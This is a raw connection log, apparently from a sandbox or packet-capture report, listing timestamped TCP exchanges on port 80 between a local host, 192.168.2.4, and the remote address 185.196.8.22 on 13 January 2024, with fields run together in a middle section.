Jan 13, 2024 06:32:56.291934967 CET | 49741 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:32:56.509675980 CET | 80 | 49741 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:32:56.509928942 CET | 49741 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:32:56.619421959 CET | 49741 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:32:56.836061001 CET | 80 | 49741 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:32:56.836170912 CET | 49741 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:32:56.947837114 CET | 49741 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:32:57.171179056 CET | 80 | 49741 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:32:57.171305895 CET | 49741 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:32:57.293560028 CET | 49741 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:32:57.294080019 CET | 49742 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:32:57.479914904 CET | 80 | 49741 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:32:57.479973078 CET | 80 | 49742 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:32:57.480030060 CET | 49741 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:32:57.480087042 CET | 49742 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:32:57.480485916 CET | 49742 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:32:57.666487932 CET | 80 | 49742 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:32:57.697202921 CET | 80 | 49742 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:32:57.697412968 CET | 49742 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:32:57.807179928 CET | 49742 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:32:58.023518085 CET | 80 | 49742 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:32:58.023590088 CET | 49742 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:32:58.135067940 CET | 49742 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:32:58.360673904 CET | 80 | 49742 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:32:58.361965895 CET | 80 | 49742 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:32:58.362065077 CET | 49742 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:32:58.478743076 CET | 49742 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:32:58.479305983 CET | 49743 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:32:58.664894104 CET | 80 | 49742 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:32:58.664966106 CET | 49742 | 80 | 192.168.2.4 | 185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:58.665066957 CET8049743185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:32:58.665141106 CET4974380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:58.666810989 CET4974380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:58.852902889 CET8049743185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:32:58.883490086 CET8049743185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:32:58.883574009 CET4974380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:58.994115114 CET4974380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:59.215150118 CET8049743185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:32:59.215221882 CET4974380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:59.337743998 CET4974380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:59.338231087 CET4974480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:59.524311066 CET8049743185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:32:59.524377108 CET8049744185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:32:59.524494886 CET4974380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:59.524619102 CET4974480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:59.524748087 CET4974480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:59.710566044 CET8049744185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:32:59.741477966 CET8049744185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:32:59.741790056 CET4974480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:32:59.853621006 CET4974480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:00.070429087 CET8049744185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:00.070538044 CET4974480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:00.182375908 CET4974480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:00.406045914 CET8049744185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:00.406136990 CET4974480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:00.525379896 CET4974480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:00.525752068 CET4974580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:00.711555958 CET8049744185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:00.711704016 CET8049745185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:00.711899042 CET4974580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:00.711960077 CET4974480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:00.712280035 CET4974580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:00.898427010 CET8049745185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:00.928683996 CET8049745185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:00.928790092 CET4974580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:01.041418076 CET4974580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:01.263536930 CET8049745185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:01.263663054 CET4974580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:01.386909962 CET4974580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:01.387403965 CET4974680192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:01.573206902 CET8049745185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:01.573322058 CET4974580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:01.573693991 CET8049746185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:01.573801994 CET4974680192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:01.574083090 CET4974680192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:01.760930061 CET8049746185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:01.791479111 CET8049746185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:01.791572094 CET4974680192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:01.916584969 CET4974680192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:01.917304993 CET4974780192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:02.102874041 CET8049746185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:02.103002071 CET4974680192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:02.103462934 CET8049747185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:02.103658915 CET4974780192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:02.104852915 CET4974780192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:02.291224957 CET8049747185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:02.326613903 CET8049747185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:02.326811075 CET4974780192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:02.449719906 CET4974780192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:02.450042009 CET4974880192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:02.636183023 CET8049748185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:02.636248112 CET8049747185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:02.636548996 CET4974880192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:02.636552095 CET4974780192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:02.636725903 CET4974880192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:02.823101997 CET8049748185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:02.853491068 CET8049748185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:02.853801966 CET4974880192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:02.995610952 CET4974880192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:02.996082067 CET4974980192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:03.182034969 CET8049748185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:03.182121992 CET8049749185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:03.182290077 CET4974880192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:03.182332039 CET4974980192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:03.182521105 CET4974980192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:03.369158030 CET8049749185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:03.405860901 CET8049749185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:03.406162024 CET4974980192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:03.525754929 CET4974980192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:03.526201963 CET4975080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:03.712014914 CET8049749185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:03.712078094 CET8049750185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:03.712131977 CET4974980192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:03.712214947 CET4975080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:03.712527990 CET4975080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:03.900110006 CET8049750185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:03.931130886 CET8049750185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:03.931258917 CET4975080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:04.041182995 CET4975080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:04.266657114 CET8049750185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:04.266748905 CET4975080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:04.387151957 CET4975080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:04.387686014 CET4975180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:04.573446989 CET8049750185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:04.573478937 CET8049751185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:04.573566914 CET4975080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:04.573710918 CET4975180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:04.574387074 CET4975180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:04.778069973 CET8049751185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:04.808871984 CET8049751185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:04.809140921 CET4975180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:04.942831993 CET4975180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:04.943419933 CET4975280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:05.128801107 CET8049751185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:05.129059076 CET4975180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:05.129344940 CET8049752185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:05.129487038 CET4975280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:05.129722118 CET4975280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:05.315696955 CET8049752185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:05.351854086 CET8049752185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:05.352066040 CET4975280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:05.463480949 CET4975280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:05.681056023 CET8049752185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:05.681287050 CET4975280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:05.793431997 CET4975280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:06.010400057 CET8049752185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:06.010657072 CET4975280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:06.138029099 CET4975280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:06.138797045 CET4975380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:06.324012041 CET8049752185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:06.324117899 CET4975280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:06.324538946 CET8049753185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:06.324644089 CET4975380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:06.324937105 CET4975380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:06.510740995 CET8049753185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:06.546228886 CET8049753185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:06.546605110 CET4975380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:17.003040075 CET4976780192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:17.333622932 CET4976780192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:17.395694017 CET4976880192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:17.520948887 CET8049767185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:17.521300077 CET4976780192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:17.581957102 CET8049768185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:17.582135916 CET4976880192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:18.792203903 CET4976880192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:18.978605986 CET8049768185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:19.013776064 CET8049768185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:19.013974905 CET4976880192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:19.135354042 CET4976880192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:19.135845900 CET4976980192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:19.322086096 CET8049768185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:19.322144985 CET8049769185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:19.322252989 CET4976880192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:19.322338104 CET4976980192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:19.323282003 CET4976980192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:19.509407997 CET8049769185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:19.545475960 CET8049769185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:19.545536041 CET4976980192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:19.673347950 CET4976980192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:19.673815966 CET4977080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:19.859540939 CET8049769185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:19.859710932 CET4976980192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:19.859941959 CET8049770185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:19.860042095 CET4977080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:19.860307932 CET4977080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:20.046413898 CET8049770185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:20.077200890 CET8049770185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:20.077269077 CET4977080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:20.197540998 CET4977080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:20.198052883 CET4977180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:20.383874893 CET8049770185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:20.384100914 CET4977080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:20.384160042 CET8049771185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:20.384377003 CET4977180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:20.385287046 CET4977180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:20.572633982 CET8049771185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:20.605820894 CET8049771185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:20.605918884 CET4977180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:20.730348110 CET4977180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:20.731312990 CET4977280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:20.916457891 CET8049771185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:20.916690111 CET4977180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:20.917356968 CET8049772185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:20.917521954 CET4977280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:20.917853117 CET4977280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:21.103904009 CET8049772185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:21.145807981 CET8049772185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:21.145936966 CET4977280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:21.260404110 CET4977280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:21.446788073 CET8049772185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:21.477252007 CET8049772185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:21.477368116 CET4977280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:21.589920998 CET4977280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:21.806840897 CET8049772185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:21.806920052 CET4977280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:21.921629906 CET4977280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:22.143377066 CET8049772185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:22.144304991 CET4977280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:22.259748936 CET4977280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:22.260118961 CET4977380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:22.446818113 CET8049772185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:22.446885109 CET8049773185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:22.446970940 CET4977380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:22.446980000 CET4977280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:22.447246075 CET4977380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:22.633584023 CET8049773185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:22.664195061 CET8049773185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:22.664854050 CET4977380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:22.776323080 CET4977380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:22.993115902 CET8049773185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:22.993303061 CET4977380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:23.104121923 CET4977380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:23.326683044 CET8049773185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:23.326776028 CET4977380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:23.447686911 CET4977380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:23.448230982 CET4977480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:23.634558916 CET8049773185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:23.634692907 CET8049774185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:23.634747028 CET4977380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:23.634784937 CET4977480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:23.635052919 CET4977480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:23.821125031 CET8049774185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:23.851478100 CET8049774185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:23.851557016 CET4977480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:23.973192930 CET4977480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:23.973849058 CET4977580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:24.159122944 CET8049774185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:24.159208059 CET4977480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:24.160140038 CET8049775185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:24.160370111 CET4977580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:24.160497904 CET4977580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:24.347609997 CET8049775185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:24.382257938 CET8049775185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:24.382483006 CET4977580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:24.495011091 CET4977580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:24.711961985 CET8049775185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:24.712266922 CET4977580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:24.822813988 CET4977580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:25.039720058 CET8049775185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:25.039833069 CET4977580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:25.150953054 CET4977580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:25.372836113 CET8049775185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:25.373131990 CET4977580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:25.494641066 CET4977580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:25.495064020 CET4977680192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:25.681036949 CET8049776185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:25.681101084 CET8049775185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:25.681142092 CET4977680192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:25.681284904 CET4977580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:25.681452990 CET4977680192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:25.867326021 CET8049776185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:25.897917986 CET8049776185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:25.897996902 CET4977680192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:26.015897989 CET4977680192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:26.237591982 CET8049776185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:26.237669945 CET4977680192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:26.359246969 CET4977680192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:26.359913111 CET4977780192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:26.545491934 CET8049776185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:26.545605898 CET4977680192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:26.545989990 CET8049777185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:26.546083927 CET4977780192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:26.546508074 CET4977780192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:26.732820034 CET8049777185.196.8.22192.168.2.4
Jan 13, 2024 06:33:26.762892962 CET  80     49777  185.196.8.22  192.168.2.4
Jan 13, 2024 06:33:26.763123035 CET  49777  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:26.885451078 CET  49777  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:26.885926962 CET  49778  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:27.071556091 CET  80     49777  185.196.8.22  192.168.2.4
Jan 13, 2024 06:33:27.071635008 CET  49777  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:27.071769953 CET  80     49778  185.196.8.22  192.168.2.4
Jan 13, 2024 06:33:27.071912050 CET  49778  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:27.072328091 CET  49778  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:27.259557009 CET  80     49778  185.196.8.22  192.168.2.4
Jan 13, 2024 06:33:27.294039011 CET  80     49778  185.196.8.22  192.168.2.4
Jan 13, 2024 06:33:27.294152975 CET  49778  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:27.416526079 CET  49778  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:27.416915894 CET  49779  80     192.168.2.4   185.196.8.22
Jan 13, 2024 06:33:27.602945089 CET  80     49778  185.196.8.22  192.168.2.4
Jan 13, 2024 06:33:27.603008032 CET  80     49779  185.196.8.22  192.168.2.4
Jan 13, 2024 06:33:27.603127956 CET  49779  80     192.168.2.4   185.196.8.22
